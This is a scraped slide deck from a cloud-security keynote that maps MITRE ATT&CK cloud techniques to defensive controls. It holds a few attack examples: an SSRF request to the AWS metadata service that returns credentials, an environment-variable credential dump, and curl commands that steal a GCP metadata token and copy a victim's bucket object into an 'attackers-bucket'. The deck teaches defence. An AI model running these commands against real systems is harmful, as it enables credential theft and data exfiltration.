SlideShare a Scribd company logo

Breaking The Cloud Kill Chain

Puma Security, LLC
Puma Security, LLC

Organizations are moving data and applications into public cloud services at a rapid pace. As the public cloud footprint expands, red teams and attackers are reinventing the kill chain in the cloud. Public cloud services provide new, creative ways to discover assets, compromise credentials, move laterally, and exfiltrate data. In this keynote, we explore common techniques from the MITRE ATT&CK Cloud Matrix. For each technique, attendees will analyze misconfigurations, exploitation paths, and common architecture patterns for breaking the kill chain.

Technology
1 of 52
Download to read offline
Breaking The Cloud Kill Chain
Eric Johnson • Principal Security Engineer, Puma Security → Coder: cloud infrastructure automation, CI / CD orchestration, static analysis engine, security tools → Security assessments: Cloud, DevOps, source code, web apps, mobile apps • Senior Instructor, SANS Institute → Contributing author of SEC540, SEC510, SEC549 • Education & Training → Iowa State M.S. Information Assurance, B.S. Computer Engineering → AWS Certified Developer, CISSP, GPCS, GSSP, GWAPT • Contact information → Email: ejohnson@pumasecurity.io → LinkedIn: https://www.linkedin.com/in/eric-m-johnson/ → Twitter: @emjohn20 $ aws sts get-caller-identity 2
ŒCloud MITRE ATT&CK Framework Cloud Infrastructure Discovery ŽUnsecured Credentials Network Service Discovery Transfer Data to Cloud Account Agenda 3
MITRE ATT&CK tactics covering cloud-based attack techniques: Understanding the Cloud Kill Chain 4
The MITRE ATT&CK Cloud Matrix guides our attack methodology for the key cloud services: MITRE ATT&CK Cloud Services 5
T1580: Cloud Infrastructure Discovery
MITRE ATT&CK T1580: Discovering infrastructure and resources misconfigured for public cloud access: Cloud Infrastructure Discovery 7 • Storage buckets • Big data sets / databases • Container image repositories • Secrets and cryptographic keys • Virtual machine image or database snapshots
AWS Exposable Resources, by Scott Piper, contains a list of non-VPC bound AWS resources that can also be exposed publicly: AWS Publicly Exposable Resources 8 • S3 Bucket ACLs and public bucket policy • EBS Volume Snapshots shared publicly • EC2 Amazon Machine Images shared publicly • ECR container image public repositories • RDS Database and Cluster Snapshots • SQS Queue public policy • SNS notification topics public policy • Lambda function URLs provided a dedicated HTTPS endpoint • More at https://github.com/SummitRoute/ aws_exposable_resources
Big Query Datasets support sharing with allUsers and external cloud identity accounts: BigQuery Public Datasets 9
10 Azure Virtual Machines Disk Snapshots • Sharable with other users in the AD tenant • Supports direct downloads using SAS tokens • Provides a non-VNet bound way to exfiltrate snapshots
Defending against resource misconfiguration starts with applying detective and preventative policies in the resource hierarchy: Breaking The Kill Chain: MITRE ATT&CK T1580 11 • Service Control Policy (SCP) • Azure Policy • Organization Policy AWS Azure GCP
Service Control Policy (SCP) documents can attach to the root, OU, and account level nodes in the AWS organization: Breaking The Kill Chain: Cloud Resource Hierarchy 12
13 Breaking The Kill Chain: Service Control Policies { "Statement": [ { "Action": [ "s3:PutAccountPublicAccessBlock" ], "Resource": "*", "Effect": "Deny" } ] } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 Example SCPs blocking API calls to modify public S3 and Lambda function URL configurations: { "Statement": [ { "Action": [ "lambda:CreateFunctionUrlConfig", "lambda:UpdateFunctionUrlConfig" ], "Resource": "arn:aws:arn:aws:lambda:*:*:function/*", "Effect": "Deny", "Condition": { "StringNotEquals": { "lambda:FunctionUrlAuthType": "AWS_IAM" … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14
T1552: Unsecured Credentials
MITRE ATT&CK T1522: Discovering insecurely stored IAM and service account credentials: Unsecured Credentials 15 Unsecured Credential Locations Bash History Configuration Files Source Code Version Control Instance Metadata Service Environment Variables
Attackers target credentials that map to many different resource types across the cloud providers: Cloud Credential Types 16 • IAM Users & Roles • Service Principal & Managed Identity • Service Accounts AWS IAM Azure AD Cloud Identity
Cloud-focused malware (e.g., TeamTNT) will focus on common locations with cleartext credentials: • ~/.aws/credentials • ~/.azure/accessTokens.json • ~/.config/gcloud/*credential* • ~/.ssh/* Configuration File Credentials 17
• Node Package Manager • Scanned by Aidan Steele in October 2021 • Identifies 117 valid API keys, including 30 AWS root access keys • https://sec549.com/id259 Version Control and Package Managers 18 • Python Package Index (PyPI) • Scanned by Tom Forbes in January 2023 • Identifies 57 valid AWS API keys, including 11 AWS root access keys • https://sec549.com/id260
19 Environment Variable Credentials env | grep 'AWS' AWS_LAMBDA_FUNCTION_VERSION=$LATEST AWS_SESSION_TOKEN=IQoJb3JpZu2DaXVzLWVhc3Q...4pg9g== AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/serverlessprey-panther AWS_LAMBDA_LOG_STREAM_NAME=2020/01/05/[$LATEST]786a6193a27eb390c0a AWS_DEFAULT_REGION=us-east-1 AWS_SECRET_ACCESS_KEY=aEWSwA8k/U7IY38JetxQDZ9voUG AWS_ACCESS_KEY_ID=ASIA54BL6EJRTTJ4SS7A 1 2 3 4 5 6 7 8 9 • Continuous Integration pipelines, containers, and functions often have secrets stored in environment variables • Local File Inclusion (LFI) and Command Injection vulnerabilities can allow attackers to exfiltrate environment variables
20 Server-Side Request Forgery Credential Extraction curl -s "https://nimbus.labs/api/emrs?resource=http://169.254.169.254/latest/meta- data/iam/security-credentials/nimbus-iam-role { "Code" : "Success", "LastUpdated" : "2020-04-16T18:36:31Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA54BL6PJR3MV6PUNZ", "SecretAccessKey" : "S0M6vF4UmMlfmV5B/bM2lalWpdTzocbUsSWMMHRI", "Token" : "IQoJb3JpZ2luX2VjEJP...3QtMSJGMEQCIGlgtwykQYitLv8Vg==", "Expiration" : "2020-04-17T00:52:19Z" } 1 2 3 4 5 6 7 8 9 10 11 12 Server-side Request Forgery (SSRF) vulnerabilities can allow attackers to communicate directly with virtual machine instance metadata services:
Defending against unsecured credentials requires defense in depth controls: Breaking The Kill Chain: MITRE ATT&CK T1522 21 • Cloud Threat Detection • OpenID Connect Identity Provider Secrets Scanning Compromised Credential Detection Workload Identity Federation • Version Control Repositories
Breaking The Kill Chain: Version Control Secrets Scanning 22 Perform incremental and continuous secrets scanning:
Cloud-native threat detection capabilities have limited capabilities for finding stolen credentials: Breaking The Kill Chain: Cloud Threat Detection 23 AWS GuardDuty • *:IAMUser/ AnomalousBehavior • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. InsideAWS • UnauthorizedAccess:IAMUser/ InstanceCredentialExfiltration. OutsideAWS
24 Breaking The Kill Chain: Cloud Threat Hunting protoPayload: { @type: "type.googleapis.com/google.cloud.audit.AuditLog" authenticationInfo: { principalEmail: "cheetah-354157@appspot.gserviceaccount.com" principalSubject: "user:sec510-354157@appspot.gserviceaccount.com" } … methodName: "google.cloud.secrets.v1beta1.SecretManagerService.AccessSecretVersion" resourceName: "projects/123456789012/secrets/cheetah-database-pass/versions/latest" serviceName: "secretmanager.googleapis.com" requestMetadata: { callerIp: "95.025.143.109" callerSuppliedUserAgent: "curl/7.64.1,gzip(gfe),gzip(gfe)" … } } … timestamp: "2023-01-10T20:30:00.192825193Z" 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 Threat hunting will have to fill the gaps: Google Cloud Logging WHY IS A CLOUD FUNCTION SERVICE ACCOUNT… ACCESSING SECRETS… FROM AN EXTERNAL IP ADDRESS?
Breaking The Kill Chain: Workload Identity Federation 25 Protip: Long-lived credentials must die!
T1046: Network Service Discovery
MITRE ATT&CK T1046: Enumerating resources with public IP addresses in the victim's cloud account: Network Service Discovery 27 • VPC-bound resource types include: • Virtual machines, load balancers, containers, datastores, Redis clusters, data lakes • Public cloud IP address blocks are well known • Large scale cloud network service discovery (e.g., Shodan, Nmap) • Cloud Scanning For Vulnerability Discovery by @joswr1ght • https://sec510.com/1042 • Identify remotely exploitable hosts and software
EC2 instances created in the AWS Web Console auto-generate a new security group with default open admin access: • Linux VMs auto populate open SSH access • Windows VMs auto populate open RDP access AWS Default Virtual Machine Security Group 28
Azure Virtual Machines created in the UI default to open admin access: • Linux VMs auto-populate open SSH access • Windows VMs auto-populate RDP access Azure Default Virtual Machine Network Access 29
Default VPC contains pre-populated firewall rules allowing wide open administrative access: GCP Default Network Firewall Rules 30
Shodan searching for virtual machines on Google Compute Engine exposing SSH and RDP ports: Misconfigured GCP Firewall Rules 31
Defending against network service discovery requires organizations to build more advanced network architectures: Breaking The Kill Chain: MITRE ATT&CK T1046 32 • Shared VPC & Transit Gateway • Azure Virtual WAN • Shared VPC, Cloud Routing, Peering, VPN AWS Azure Google Cloud
Centralize VPC resources into a single network host account (or project) in the resource hierarchy: Breaking The Kill Chain: VPC Sharing 33 • VPC networks & subnets • Internet & NAT Gateways • Public IP addresses • Route tables • Firewall rules → NACLs → Security Groups • VPC Endpoints
34 Breaking The Kill Chain: Restricting Public Network Connectivity { "Sid": "RestrictPublicConnectivityToInfrastructureAccounts", "Effect": "Deny", "Action": [ "ec2:AllocateAddress", "ec2:AttachInternetGateway", "ec2:CreateInternetGateway", "ec2:CreateEgressOnlyInternetGateway", "ec2:CreateVpcPeeringConnection", "ec2:AcceptVpcPeeringConnection", "globalaccelerator:Create*", "globalaccelerator:Update*" ], "Resource": "*", "Condition": { "StringNotEquals": { "aws:PrincipalAccount": [ "123456789012" ] … } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 Preventing unauthorized public network access: ACTIONS CREATING PUBLIC CONNECTIVITY… DENY…. EXCEPT FOR THE NETWORK HOST ACCOUNT
Breaking The Kill Chain: Centralized Resource Configurations 35 Centralizing network resources into the network host account provides a single pane of glass for public connectivity: PUBLIC INVENTORY
Breaking The Kill Chain: Centralized Inbound, Outbound, Traffic Inspection 36
T1537: Transfer Data to Cloud Account
MITRE ATT&CK T1537: Exfiltrating data from the victim's cloud account by escalating privileges and transferring data on the cloud provider's backbone network to avoid network-based detection Transfer Data to the Attacker's Cloud Account 38 • Compromising over permissioned service accounts • Impersonating a target service account • Transferring data across the cloud provider's backbone network • Pivoting with stolen credentials
39 Privilege Escalation: Azure Overly Scoped Role Definition { "assignableScopes": [ "/subscriptions/${var.subscription_id}" ], "permissions": [ { "actions": [ "Microsoft.Storage/storageAccounts/listKeys/action", "Microsoft.Storage/storageAccounts/ListAccountSas/action", "Microsoft.Storage/storageAccounts/read" ], } ], "roleName": "Storage Access" } 1 2 3 4 5 6 7 8 9 10 11 12 13 Example role definition allowing excessive permissions and overly scoped access to resources: SUBSCRIPTION-WIDE SCOPE TO ALL STORAGE ACCOUNTS
Google Cloud's Primitive Editor role has permission to view, modify, and delete existing project resources (with a few exceptions): • Default role assigned to Compute instances, App Engine services, and Cloud Functions • Too permissive for what your workload needs in production • Has over 4,000 assigned permissions on the project • Attackers compromising workloads with Editor permissions can access data across the project Privilege Escalation: Google Cloud's Primitive Editor Role 40
Transitive privilege escalation occurs by creating a resource that inherits permissions from a supplied service account: • AWS: iam:PassRole permission • GCP: iam.serviceAccounts.actAs permission Privilege Escalation: Transitive Permission Assignment 41 Create a Compute Instance Configure Compute to Run as the target service account Obtain token through the Instance Metadata Server (IMDS) Impersonate Privileged Service Account in Project
Attackers leverage private service access (private link) to exfiltrate data across the cloud provider's backbone network: • Private link services are designed to help customers keep data from traversing the Internet • Default policy (AWS, GCP) allows multi- tenant access to the cloud provider APIs • May allow data to move cross-tenant between resources without network and firewall inspection Data Exfiltration: Transferring Data Cross Tenant 42
43 Data Exfiltration: Stolen Credential Pivoting export BEARER_TOKEN=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/ computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token) # List all storage buckets in the victim's project curl -s -H "Authorization: Bearer $BEARER_TOKEN" "https://storage.googleapis.com/storage/v1/b?project=victims-project" # Copy objects from the victim's bucket curl -s -X POST -H "Authorization: Bearer $BEARER_TOKEN" https://storage.googleapis.com/storage/v1/b/victims-bucket/o/data.pdf/copyTo/b/attackers- bucket/o/data.pdf 1 2 3 4 5 6 7 8 9 10 11 Exfiltrating data from the victim's Google Cloud project using the stolen credential:
Defending against privilege escalation and data exfiltration requires additional cloud-native controls to prevent data from leaving the organization's tenant: Breaking The Kill Chain: MITRE ATT&CK T1537 44 • IAM Access Analyzer • IAM Recommender • Private Link Services • Network Access Rules • VPC Service Controls AWS / GCP AWS / Azure Google Cloud
Breaking The Kill Chain: IAM Recommender 45 Reviewing IAM Recommender reports and reducing excessive permissions:
Breaking The Kill Chain: Service Endpoint Configuration 46 Preventing data exfiltration with private link services and network access policy:
Breaking The Kill Chain: VPC Service Controls 47 Configuring a VPC Service Controls perimeter to prevent data exfiltration: • Perimeter includes the authorized projects • In-scope services include the GCS storage service • Unauthorized projects and external clients cannot interact with the target GCS bucket
Conclusions
Breaking The Cloud Kill Chain requires an in-depth understanding of cloud-native services and configurations: Closing Remarks Resources can be made public too easily, build guardrails with the policy hierarchy Credential management continues to be a problem, move to workload identity federation Cloud resources are Internet exposed too easily, central network inspection is critical New ways to hide & exfiltrate data exist, focus on building network identity perimeters
51
Thank you for attending! Questions? 52

Recommended

IAM Introduction and Best Practices
IAM Introduction and Best PracticesIAM Introduction and Best Practices
IAM Introduction and Best PracticesAmazon Web Services
 
Introduction to Identity and Access Management (IAM)
Introduction to Identity and Access Management (IAM)Introduction to Identity and Access Management (IAM)
Introduction to Identity and Access Management (IAM)Amazon Web Services
 
Aws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasAws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasNicole Maus
 
AWS IAM Introduction
AWS IAM IntroductionAWS IAM Introduction
AWS IAM IntroductionAmazon Web Services
 
Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Puma Security, LLC
 
Iam presentation
Iam presentationIam presentation
Iam presentationAWS UG PK
 
Cloud Security Demystified
Cloud Security DemystifiedCloud Security Demystified
Cloud Security DemystifiedMichael Torres
 
Aws IAM
Aws IAMAws IAM
Aws IAMChamali Liyanage
 

Recommended

IAM Introduction and Best Practices
IAM Introduction and Best PracticesIAM Introduction and Best Practices
IAM Introduction and Best PracticesAmazon Web Services
 
Introduction to Identity and Access Management (IAM)
Introduction to Identity and Access Management (IAM)Introduction to Identity and Access Management (IAM)
Introduction to Identity and Access Management (IAM)Amazon Web Services
 
Aws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasAws Architecture Fundamentals | Dallas
Aws Architecture Fundamentals | DallasNicole Maus
 
AWS IAM Introduction
AWS IAM IntroductionAWS IAM Introduction
AWS IAM IntroductionAmazon Web Services
 
Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Cloud Security: Attacking The Metadata Service v2
Cloud Security: Attacking The Metadata Service v2Puma Security, LLC
 
Iam presentation
Iam presentationIam presentation
Iam presentationAWS UG PK
 
Cloud Security Demystified
Cloud Security DemystifiedCloud Security Demystified
Cloud Security DemystifiedMichael Torres
 
Aws IAM
Aws IAMAws IAM
Aws IAMChamali Liyanage
 
Data Protection in Transit and at Rest
Data Protection in Transit and at RestData Protection in Transit and at Rest
Data Protection in Transit and at RestAmazon Web Services
 
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나Amazon Web Services Korea
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYMaganathin Veeraragaloo
 
AWS Security and SecOps
AWS Security and SecOpsAWS Security and SecOps
AWS Security and SecOpsShiva Narayanaswamy
 
Intro to AWS: Security
Intro to AWS: SecurityIntro to AWS: Security
Intro to AWS: SecurityAmazon Web Services
 
Azure Security Overview
Azure Security OverviewAzure Security Overview
Azure Security OverviewDavid J Rosenthal
 
AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAmazon Web Services
 
(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep Dive(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep DiveAmazon Web Services
 
Intro to AWS Lambda
Intro to AWS Lambda Intro to AWS Lambda
Intro to AWS Lambda Amazon Web Services
 
Cyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access managementCyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access managementseadeloitte
 
Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to Security Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to SecurityPriyanka Aash
 
Introduction to AWS Secrets Manager
Introduction to AWS Secrets ManagerIntroduction to AWS Secrets Manager
Introduction to AWS Secrets ManagerAmazon Web Services
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...Edureka!
 
AWS Secrets Manager
AWS Secrets ManagerAWS Secrets Manager
AWS Secrets ManagerAmazon Web Services
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architectureYuechuan (Mike) Chen
 
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018Amazon Web Services
 
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...Simplilearn
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...MITRE ATT&CK
 
Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWSManojAccTest
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAmazon Web Services
 

More Related Content

What's hot

Data Protection in Transit and at Rest
Data Protection in Transit and at RestData Protection in Transit and at Rest
Data Protection in Transit and at RestAmazon Web Services
 
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나Amazon Web Services Korea
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAmazon Web Services
 
(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep Dive(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep DiveAmazon Web Services
 
Cyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access managementCyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access managementseadeloitte
 
Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to Security Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to SecurityPriyanka Aash
 
Introduction to AWS Secrets Manager
Introduction to AWS Secrets ManagerIntroduction to AWS Secrets Manager
Introduction to AWS Secrets ManagerAmazon Web Services
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityAmazon Web Services
 
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...Edureka!
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architectureYuechuan (Mike) Chen
 
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018Amazon Web Services
 
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...Simplilearn
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...MITRE ATT&CK
 

What's hot (20)

Data Protection in Transit and at Rest
Data Protection in Transit and at RestData Protection in Transit and at Rest
Data Protection in Transit and at Rest
 
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
Amazon SageMaker 모델 배포 방법 소개::김대근, AI/ML 스페셜리스트 솔루션즈 아키텍트, AWS::AWS AIML 스페셜 웨비나
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
CLOUD NATIVE SECURITY
CLOUD NATIVE SECURITYCLOUD NATIVE SECURITY
CLOUD NATIVE SECURITY
 
AWS Security and SecOps
AWS Security and SecOpsAWS Security and SecOps
AWS Security and SecOps
 
Intro to AWS: Security
Intro to AWS: SecurityIntro to AWS: Security
Intro to AWS: Security
 
Azure Security Overview
Azure Security OverviewAzure Security Overview
Azure Security Overview
 
AWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets ManagerAWS Security Week: AWS Secrets Manager
AWS Security Week: AWS Secrets Manager
 
(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep Dive(SEC318) AWS CloudTrail Deep Dive
(SEC318) AWS CloudTrail Deep Dive
 
Intro to AWS Lambda
Intro to AWS Lambda Intro to AWS Lambda
Intro to AWS Lambda
 
Cyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access managementCyber 101: An introduction to privileged access management
Cyber 101: An introduction to privileged access management
 
Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to Security Overview of Google’s BeyondCorp Approach to Security
Overview of Google’s BeyondCorp Approach to Security
 
Introduction to AWS Secrets Manager
Introduction to AWS Secrets ManagerIntroduction to AWS Secrets Manager
Introduction to AWS Secrets Manager
 
Identity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS SecurityIdentity and Access Management: The First Step in AWS Security
Identity and Access Management: The First Step in AWS Security
 
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
AWS IAM Tutorial | Identity And Access Management (IAM) | AWS Training Videos...
 
AWS Secrets Manager
AWS Secrets ManagerAWS Secrets Manager
AWS Secrets Manager
 
Overview of secret management solutions and architecture
Overview of secret management solutions and architectureOverview of secret management solutions and architecture
Overview of secret management solutions and architecture
 
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
Module 2: Core AWS Compute and Storage Services - Virtual AWSome Day June 2018
 
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
AWS S3 | Tutorial For Beginners | AWS S3 Bucket Tutorial | AWS Tutorial For B...
 
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
ATT&CK is the Best Defense - Emulating Sophisticated Adversary Malware to Bol...
 

Similar to Breaking The Cloud Kill Chain

Building Secure Architectures on AWS
Building Secure Architectures on AWSBuilding Secure Architectures on AWS
Building Secure Architectures on AWSManojAccTest
 
AWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAWS Summit Sydney 2014 | Understanding AWS Security
AWS Summit Sydney 2014 | Understanding AWS SecurityAmazon Web Services
 
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...CIS Compliance Automations Eevidence Collection, Security and Compliance Be...
CIS Compliance Automations Eevidence Collection, Security and Compliance Be...Faiza Mehar
 
AWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - HoustonAWS Architecture Fundamentals - Houston
AWS Architecture Fundamentals - HoustonNicole Maus
 
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...
Hackproof Your Gov Cloud: Mitigating Risks for 2017 and Beyond | AWS Public S...Amazon Web Services
 
Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats Hackproof Your Cloud: Responding to 2016 Threats
Hackproof Your Cloud: Responding to 2016 Threats CloudCheckr
 
MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB
 
Advanced Security Best Practices Masterclass
Advanced Security Best Practices MasterclassAdvanced Security Best Practices Masterclass
Advanced Security Best Practices MasterclassAmazon Web Services
 
AWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design PatternsAWS Security Best Practices and Design Patterns
AWS Security Best Practices and Design PatternsAmazon Web Services
 
Network Security and Access Control within AWS
Network Security and Access Control within AWS Network Security and Access Control within AWS
Network Security and Access Control within AWS Amazon Web Services
 
Building A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleBuilding A Cloud Security Strategy for Scale
Building A Cloud Security Strategy for ScaleChris Farris
 
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)
AWS re:Invent 2016: Hackproof Your Cloud: Responding to 2016 Threats (SAC308)Amazon Web Services
 
DevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessDevSecOps: Key Controls to Modern Security Success
DevSecOps: Key Controls to Modern Security SuccessPuma Security, LLC
 
AWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxAWS Basic Practitioner Heena Talreja.pptx
AWS Basic Practitioner Heena Talreja.pptxHitendrasingh79
 
Cloud Security Architecture.pptx
